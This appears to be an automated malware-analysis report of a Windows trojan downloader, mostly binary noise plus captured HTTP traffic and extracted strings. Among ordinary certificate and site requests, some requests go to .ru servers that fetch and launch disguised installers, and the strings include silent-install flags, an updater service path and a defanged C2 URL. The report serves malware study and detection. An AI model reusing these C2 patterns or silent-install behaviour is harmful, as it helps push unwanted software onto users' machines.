*..@I...t...|9t..ck9)...`.._.G.....T../B..}..F..H:G..l...<......^..
.X..i..I..nxf.2...?sD.....8.....j.X..h8P@Ja..96&M.&..mmb...:.8&...<<< skipped >>>

GET /webservice/v1/symbols/allcurrencies/quote?format=json&random=0.44692643848247826 HTTP/1.1

Host: finance.yahoo.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept: */*

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8

Cookie: B=52qa5ah9dvsod&b=3&s=ur; RMBX=52qa5ah9dvsod&b=3&s=ur&t=33


HTTP/1.1 406 Not Acceptable

Date: Mon, 23 Feb 2015 09:35:31 GMT

content-length: 21

content-type: text/plain; charset=utf-8

Cache-Control: max-age=0, private

Expires: -1

Vary: X-Ssl

Age: 0

Via: http/1.1 yts212.global.media.ir2.yahoo.com (ApacheTrafficServer [cMsSf ]), http/1.1 r08.ycpi.ir2.yahoo.net (ApacheTrafficServer [cMsSf ])

Server: ATS

Connection: keep-alive
Not a valid parameterHTTP/1.1 406 Not Acceptable..Date: Mon, 23 Feb 20
15 09:35:31 GMT..content-length: 21..content-type: text/plain; charset
=utf-8..Cache-Control: max-age=0, private..Expires: -1..Vary: X-Ssl..A
ge: 0..Via: http/1.1 yts212.global.media.ir2.yahoo.com (ApacheTrafficS
erver [cMsSf ]), http/1.1 r08.ycpi.ir2.yahoo.net (ApacheTrafficServer 
[cMsSf ])..Server: ATS..Connection: keep-alive..Not a valid parameter<
/font>....

GET /MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6Yw== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.geotrust.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1363

content-transfer-encoding: binary

Cache-Control: max-age=314100, public, no-transform, must-revalidate

Last-Modified: Fri, 20 Feb 2015 00:47:06 GMT

Expires: Fri, 27 Feb 2015 00:47:06 GMT

Date: Mon, 23 Feb 2015 09:35:33 GMT

Connection: keep-alive
0..O......H0..D.. .....0.....50..10......7).nj./P(.3.\\.;.B....2015022
0004706Z0f0d0<0... ..........9.....yP..`...<.......*.A.....>U
....... ...:c....20150220004706Z....20150227004706Z0...*.H............
.w.FV.N..T..!..d...tkl..@..e.... .J.L.?%..[.....m..X..2!^........I<
...__.V.....hg/..y...RB.....".-........ .{..UV47.R.>...;..=...yO..x
J....<u..[.....n=.Xr.5,...a6c1.Qx..g.% .`...WL49@...Ft..).<EP.k.
]".../.t....[...;...UdF....X..........8.a....R.m.......~.......0...0..
}0..e........:}0...*.H........0B1.0...U....US1.0...U....GeoTrust Inc.1
.0...U....GeoTrust Global CA0...141201130534Z..151216130534Z02100...U.
..'GeoTrust Global CA TGV OCSP Responder 30.."0...*.H.............0...
.........\.hpc..J.a.j-.t......F`Aw...)L.YE.2..~..-...2.Y(.".CZ.w..T..Y
. syd.....x..YE..<....lwv.:J.76>U....uF.a.|8N.. ..1p...`f.X...B&
gt;x..............6..m.&...'..W.plK....[.m.V..h..lI.........?~.....>
;.|'....o...A!.Pm.*.N ...<.....3...*|.x._..1..m.W<*....._S......
.......0..0...U.#..0....z.h.....d..}.}e...N0... .....0......0...U.%..0
... .......0...U...........0...U.......0.0!..U....0...0.1.0...U....TGV
-B-2830...*.H.............~....2!...V..0...Y....L..k....z}~a.3Y.x..dS.
L...Dk$a...nR9_......B......m....Y....U.5....'.....<{....v&=.2]....
.j*.r(7...=..w.I...z....\.#.J.ac.....I.[.[....6.X....0...g.3d...z.i.H.
.f...v.....\.....^.N..1.J<.)`Z.....4.-.E..n.E.~t....v.e.T...?. ....
..i..%....<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCECJe6gdYhONI6dBjwD1kE+o= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=474265, public, no-transform, must-revalidate

Last-Modified: Sat, 21 Feb 2015 21:17:36 GMT

Expires: Sat, 28 Feb 2015 21:17:36 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
1211736Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U..."^..X..H..c.=d......20150221211736Z....20150228211736Z0...*.H.....
.........k....?y..G.M.....l..&.......m.....I|....uC.b3.Q..<Ta.{NP.I
R<............z....L.k..Q...q..;Q.`%.I..y.....,JS.-..2.#.....3.....
.].......{<.%.......@..m....d....M..'...z...6.nb.....2{d.-p.G7...?*
u0.......gNu...Q.!.k..Wv ...h.,...*j..1..........b..s....d.Y.n.....0..
.0...0..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U.
...GeoTrust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504
06235959Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SS
L CA - G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._.
..>.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6
'.e.....3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8..
.~WL..%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M...
..=RE...Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.
%..0... .......0...U...........0... .....0......0"..U....0...0.1.0...U
....TGV-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G
...~.2.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.
^.a..)OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N
.4....RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G
..O.1....OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>
;.*&-8-..<<< skipped >>>

GET /images/velalayout/favicons/7868d43b.aukro-ua.ico HTTP/1.1

Host: c.allegrostatic.pl

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Content-Type: image/x-icon

Last-Modified: Tue, 27 Jan 2015 11:11:59 GMT

Expires: Thu, 28 Jan 2016 10:39:31 GMT

Cache-Control: max-age=31536000, public

Pragma: public

Content-Length: 1150

Accept-Ranges: bytes

Date: Mon, 23 Feb 2015 09:35:39 GMT

X-Varnish: 127071042 50910018

Age: 2242567

Via: 1.1 varnish

Connection: keep-alive

X-Cache: HIT from s40532

............ .h.......(....... ..... .................................
...........%...1...7...8...8...8...8...1...$.......................*..
.........................................................,........@...
.Z...Z...Z...Z...Z...Z...Z...d.........$.................Z...Z...Z...Z
...Z...Z...Z...Z...Z...Z.........1.......'.... o...Z...Z.. o..........
.........Z...Z...Z.........8.......1.....Z...Z...Z....................
...Z...Z...Z.........8......./.....Z...Z...Z.......................Z..
.Z...Z.........8.......#....@....Z...Z...d...................Z...Z...Z
.........8.................d...Z...Z...Z...Z...Z...Z...Z...Z...Z......
...8...........%........p... o...Z...Z...Z...Z...Z...Z...Z.........6..
.............B.............................Z...Z...d........./........
.............d..................`....Z...Z..P..........#..............
.......Z...Z...Z...Z...Z...Z...Z...Z.............................`....
 o...Z...Z...Z...Z...Z...Z.............-..............................
.............................E...............................0...l....
...............J...#..................................................
...........................?......

<<< skipped >>>

GET /touch_install?name=Opera_ua.exe&hash=f0b99c0b0e005bdb5acb5ad7f2d77fd8c8f041abf8e4f52d8a529908c7321011&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75 HTTP/1.1

User-Agent: Downloader 7.2

Host: forces.prochristmasdom.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:31:19 GMT

Content-Type: text/html

Content-Length: 0

Connection: close

X-Powered-By: PHP/5.4.37

Expires: Mon, 8 Oct 2012 01:02:03 GMT

Last-Modified: Mon, 23 Feb 2015 09:31:19 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache

HEAD /gosearch3.ico HTTP/1.1

Host: illespi.dom-upload.ru

Accept: */*


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:34:20 GMT

Content-Type: image/x-icon

Content-Length: 32038

Last-Modified: Wed, 03 Dec 2014 15:19:53 GMT

Connection: keep-alive

ETag: "547f2a19-7d26"

Accept-Ranges: bytes

GET /launch_install?name=go_search_desktop.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75&hash=43dc7e69b16c87d642564ef4260203eb29efd0c7ef3e604b49815cb3e95dc36f&md5=f559ddd5ecfeb426dc00c567b9dd0cee&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75 HTTP/1.1

User-Agent: Downloader 7.2

Host: forces.prochristmasdom.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:34:20 GMT

Content-Type: text/html

Content-Length: 0

Connection: close

X-Powered-By: PHP/5.4.37

Expires: Mon, 8 Oct 2012 01:02:03 GMT

Last-Modified: Mon, 23 Feb 2015 09:34:20 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache

GET /CRL/class2.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: VVV.certplus.com


HTTP/1.1 200 OK

Content-Type: application/x-pkcs7-crl

Content-Length: 805

Connection: keep-alive

Date: Fri, 06 Feb 2015 13:51:24 GMT

Server: Apache/2.0.64 (Unix) DAV/2 mod_jk/1.2.36 mod_ssl/2.0.64 OpenSSL/0.9.8x

Last-Modified: Fri, 06 Feb 2015 13:20:34 GMT

ETag: "5e1c-325-4915ac80"

Accept-Ranges: bytes

Age: 18711

X-Cache: Hit from cloudfront

Via: 1.1 cd103c18819ef0db201c8a8cb9162bd2.cloudfront.net (CloudFront)

X-Amz-Cf-Id: NpJJARmo0y4PfY2Efa-F_wzPaRvGNYoIla7SugmF8fUloaB7MJKKHg==

0..!0......0...*.H........0=1.0...U....FR1.0...U....Certplus1.0...U...
.Class 2 Primary CA..150205000000Z..160205000000Z0..e01..."...?......*
a..!s..150205000000Z0.0...U.......01... .....j.om2.!w.....150205000000
Z0.0...U.......01... r4.yL...&r/....q..140520000000Z0.0...U.......01..
. ..........X. .Q...140520000000Z0.0...U.......01..."... t.w..x...k.d.
.140505000000Z0.0...U.......01...".f.........i...S..140520000000Z0.0..
.U.......01..."..IOC5K.9~.b;.JT..140328000000Z0.0...U......../0-0...U.
......0...U.#..0....s-...(......y....0.0...*.H...............V ..o..._
t...z..z........O..W.G...J... V.G....$\.^.1...U..I...7e.U.s.x(1.'..z.b
..T=....9......I".._s=G.<..*n.<........Hi.{...%..L...Z..-p...c./
......I#.."R.bQ... ...z....O5......~...........{.N..N%.m>.$...>o
S.......3y......Mw.8..6..]u5..s*i.i .H..v.I.j.$HTTP/1.1 200 OK..Conten
t-Type: application/x-pkcs7-crl..Content-Length: 805..Connection: keep
-alive..Date: Fri, 06 Feb 2015 13:51:24 GMT..Server: Apache/2.0.64 (Un
ix) DAV/2 mod_jk/1.2.36 mod_ssl/2.0.64 OpenSSL/0.9.8x..Last-Modified: 
Fri, 06 Feb 2015 13:20:34 GMT..ETag: "5e1c-325-4915ac80"..Accept-Range
s: bytes..Age: 18711..X-Cache: Hit from cloudfront..Via: 1.1 cd103c188
19ef0db201c8a8cb9162bd2.cloudfront.net (CloudFront)..X-Amz-Cf-Id: NpJJ
ARmo0y4PfY2Efa-F_wzPaRvGNYoIla7SugmF8fUloaB7MJKKHg==..0..!0......0...*
.H........0=1.0...U....FR1.0...U....Certplus1.0...U....Class 2 Primary
 CA..150205000000Z..160205000000Z0..e01..."...?......*a..!s..150205000
000Z0.0...U.......01... .....j.om2.!w.....150205000000Z0.0...U....

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEB46A3HdHEXOiQww+nhhjfk= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=340790, public, no-transform, must-revalidate

Last-Modified: Fri, 20 Feb 2015 08:12:19 GMT

Expires: Fri, 27 Feb 2015 08:12:19 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
0081219Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U....:.q..E...0.xa......20150220081219Z....20150227081219Z0...*.H.....
........./Ql[......[d"|...).hW.,5....U.ez.v?R.v&?.r....=..i...'.....V.
h_R.0...|.N.bI.5.b.K.:$K.[B......f.....u$=@.6.GE..J..*C.o!..hD.(<.\
...vC]X.@.r6.B......\.. .,.L..%..p....I.>....).y!...c.K:?....xS7^..
]..# .......2]..U......(...bq..........V>..},^.G................0..
.0...0..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U.
...GeoTrust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504
06235959Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SS
L CA - G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._.
..>.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6
'.e.....3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8..
.~WL..%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M...
..=RE...Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.
%..0... .......0...U...........0... .....0......0"..U....0...0.1.0...U
....TGV-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G
...~.2.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.
^.a..)OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N
.4....RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G
..O.1....OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>
;.*&-8-..<<< skipped >>>

GET /V13b***R>*mail_ru/ru/UTF-8/tmsec=mail_go/93282204 HTTP/1.1

Host: VVV.tns-counter.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8

Cookie: guid=5E45131954EAF466X1424684134


HTTP/1.1 200 OK

Server: tns-counter-1.1.0/1.6.2

Date: Mon, 23 Feb 2015 09:35:35 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

Pragma: no-cache

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, no-cache=Set-Cookie, max-age=0, proxy-revalidate
GIF89a.............!.......,...........L..;..

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_3304:

.text

.rsrc

@.idata

@.zsyh

@.tcn

@.ceie

^uel32.dll

%sss//s

<requestedExecutionLevel level="highestAvailable" uiAccess="false"></requestedExecutionLevel>

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>

KERNEL32.DLL

CreatePipe

USER32.DLL

SetKeyboardState

GDI32.DLL

%original file name%.exe_3304_rwx_00413000_00002000:

^uel32.dll

ExtensionUpdaterService.exe_2632:

.text

`.rdata

@.data

.reloc

Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

operator

GetProcessWindowStation

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyExW

WinHttpOpen

WinHttpConnect

WinHttpOpenRequest

WinHttpSendRequest

WinHttpReceiveResponse

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpCloseHandle

WINHTTP.dll

GetProcessHeap

KERNEL32.dll

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

ADVAPI32.dll

SHFileOperationW

SHELL32.dll

ole32.dll

OLEAUT32.dll

GetCPInfo

zcÁ

2)33393?3

8 8$8,8@8`8

2 2$2(20282

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

nKERNEL32.DLL

WUSER32.DLL

{1FBA04EE-3024-11d2-8F1F-0000F87ABD16}

AdvAPI32.dll

Advapi32.dll

Update Service for %s

hXXp://

" /SUPPRESSMSGBOXES /NORESTART /S /UPDATE /VERYSILENT

update.xml

UpdateLatestVersionURL

UpdateInstallerUrl

%Program Files% (x86)\advPlugin\Basement\ExtensionUpdaterService.exe

%original file name%.exe_3304_rwx_05000000_0006B000:

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

j.XjDY

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

HttpOpenRequestW

HttpSendRequestW

HttpQueryInfoW

ShellExecuteW

QueryInterface(IWebBrowser) failed

url error in "

\VBOXSVR\shared\boost\boost/property_tree/detail/ptree_implementation.hpp

\VBOXSVR\shared\boost\boost/property_tree/detail/json_parser_read.hpp

\VBOXSVR\shared\boost\boost/property_tree/string_path.hpp

SetProcessShutdownParameters

CreatePipe

KERNEL32.dll

USER32.dll

GDI32.dll

GdiplusShutdown

gdiplus.dll

PathCreateFromUrlW

SHLWAPI.dll

COMDLG32.dll

RegOpenKeyExW

RegCloseKey

RegCreateKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

SHELL32.dll

ole32.dll

OLEAUT32.dll

WININET.dll

POWRPROF.dll

VERSION.dll

PSAPI.DLL

GetCPInfo

GetConsoleOutputCP

GetProcessHeap

zcÁ

hXXp://forces.prochristmasdom.ru/get_json?stb=1&did=1497824015&ext_partner_id=&file_id=32888998

.?AU?$concrete_parser@U?$alternative@V?$action@V?$chset@_W@classic@spirit@boost@@Ua_escape@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$sequence@U?$chlit@D@classic@spirit@boost@@V?$action@U?$uint_parser@K$0BA@$03$03@classic@spirit@boost@@Ua_unicode@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@234@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$concrete_parser@U?$alternative@V?$action@U?$difference@U?$difference@Uanychar_parser@classic@spirit@boost@@V?$strlit@PBD@234@@classic@spirit@boost@@V?$strlit@PBD@234@@classic@spirit@boost@@Ua_char@?$context@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$sequence@U?$chlit@D@classic@spirit@boost@@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$rule@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@234@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$concrete_parser@U?$positive@U?$contiguous@U?$confix_parser@U?$chlit@D@classic@spirit@boost@@U?$kleene_star@V?$rule@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@234@U1234@Uunary_parser_category@234@Unon_nested@234@Unon_lexeme@234@@classic@spirit@boost@@@classic@spirit@boost@@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$concrete_parser@U?$sequence@U?$sequence@U?$sequence@U?$optional@U?$chlit@D@classic@spirit@boost@@@classic@spirit@boost@@U?$alternative@U?$chlit@D@classic@spirit@boost@@U?$sequence@U?$range@_W@classic@spirit@boost@@U?$kleene_star@Udigit_parser@classic@spirit@boost@@@234@@234@@234@@classic@spirit@boost@@U?$optional@U?$sequence@U?$chlit@D@classic@spirit@boost@@U?$positive@Udigit_parser@classic@spirit@boost@@@234@@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$optional@U?$sequence@U?$sequence@V?$chset@_W@classic@spirit@boost@@U?$optional@V?$chset@_W@classic@spirit@boost@@@234@@classic@spirit@boost@@U?$positive@Udigit_parser@classic@spirit@boost@@@234@@classic@spirit@boost@@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AU?$concrete_parser@U?$assertive_parser@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$rule@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Unil_t@234@U5234@@classic@spirit@boost@@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@_WV?$allocator@_W@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

